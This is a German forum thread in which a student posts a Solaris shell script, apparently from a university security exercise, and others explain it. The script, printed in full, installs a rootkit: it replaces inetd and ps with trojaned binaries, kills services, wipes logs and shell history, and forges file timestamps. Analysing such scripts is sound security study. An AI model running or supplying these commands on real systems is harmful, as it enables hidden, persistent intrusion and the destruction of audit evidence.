was genau macht dieses Solaris-Script?

Re(2): was genau macht dieses Solaris-Script?

Infosauger — Thu, 11 Dec 2008 21:43:46 GMT

TU Wien Security Übungsaufgabe?

yep

google mal

tja, so ungefähr hab ich schon herausgefunden, was das tut, google sei Dank.
Aber bei manchen von den Dingen hab ich nicht herausgefunden, was genau passiert, wenn man es löscht.

Re: was genau macht dieses Solaris-Script?

DaSony — Thu, 11 Dec 2008 16:59:09 GMT

TU Wien Security Übungsaufgabe?

Edit: google mal

Re: was genau macht dieses Solaris-Script?

DaSony — Thu, 11 Dec 2008 16:59:09 GMT

TU Wien Security Übungsaufgabe?

Re(2): was genau macht dieses Solaris-Script?

Infosauger — Thu, 11 Dec 2008 15:58:30 GMT

hm, diese "Kiste" existiert glücklicherweise nicht wirklich. Ich soll das script nur analysieren.

Danke auf jeden Fall, nach langem googeln bin ich auch zu dieser Lösung gekommen. Jetzt muss ich nur noch Zeile für Zeile genau schreiben, was es tut.

Re: was genau macht dieses Solaris-Script?

juwb — Thu, 11 Dec 2008 15:03:29 GMT

Da werden Binaries ersetzt, laufende Prozesse der ersetzen Binaries gekillt, und nicht zuletzt Spuren verwischt (keine Befehlshistory, gelöschte Logfiles, falsche Timestamps für die überschriebenen Dateien). Da will wohl jemand der irgendwie root geworden ist sicherstellen daß er auch in Zukunft root bleibt.

Re: was genau macht dieses Solaris-Script?

mjy@geizhals.at — Thu, 11 Dec 2008 14:41:54 GMT

Ich bin auch kein Solaris-Spezialist, aber das sieht sehr nach "backdoor installieren" aus. Das Löschen div. files wird wohl nötig sein, weil der ersetzte inetd vermutlich sonst zu sichtbaren Fehlermeldungen/Konflikten führt.

Nimm die Kiste lieber vom Netz, aber mach vorher noch ein "netstat" um zu sehen, welche IP-Adresse darauf zugreift.

was genau macht dieses Solaris-Script?

Infosauger — Thu, 11 Dec 2008 13:00:13 GMT

Folgendes Script ist gegeben, ich würde nun gerne wissen, was genau das macht:


1 unset HISTFILE; unset SAVEHIST
2 cp temp /usr/sbin/inetd;
3 chown root /usr/sbin/inetd; 
4 chgrp root /usr/sbin/inetd; 
5 touch 0716000097 /usr/sbin/inetd; 
6 rm -rf temp /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/rpc.ttdb* /usr/dt/bin/rpc.ttdb* 
7 rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/adm/sec* 
8 /usr/sbin/inetd -s; 
9 /usr/sbin/inetd -s; 
10 telnet localhost; 
11 /usr/sbin/inetd -s; 
12 ps -ef | grep inetd | grep bob |awk '{print "kill -9 " $2 }' > boo 
13 chmod 700 boo 
14 ./boo 
15 ps -ef | grep nfs | grep statd |awk '{print "kill -9 " $2 }' > boo 
16 chmod 700 boo 
17 ./boo 
18 ps -ef | grep ttdb | grep -v grep |awk '{print "kill -9 " $2 }' > boo 
19 chmod 700 boo 
20 ./boo 
21 rm -rf boo 
22 mkdir /usr/man/tmp 
23 mv update ps /usr/man/tmp 
24 cd /usr/man/tmp 
25 echo 1 \"./update -s -o output\" > /kernel/pssys 
26 chmod 755 ps update 
27 ./update -s -o output & 
28 cp ps /usr/ucb/ps 
29 mv ps /usr/bin/ps 
30 touch 0716000097 /usr/bin/ps /usr/ucb/ps 
31 cd / 
32 ps -ef | grep bob | grep -v grep 
33 ps -ef | grep stat | grep -v grep 
34 ps -ef | grep update

Ich weiss zwar grundsätzlich, was die Befehle wie cp mv etc. machen, aber was genau bewirkt nun z.B. das Löschen von /usr/lib/nfs/statd, /usr/openwin/bin/rpc.ttdb* und /var/adm/sec*?
Bin kein Unix bzw. Solaris-Spzialist, kenn mich mit dem ganzen zu wenig aus.

Danke schon mal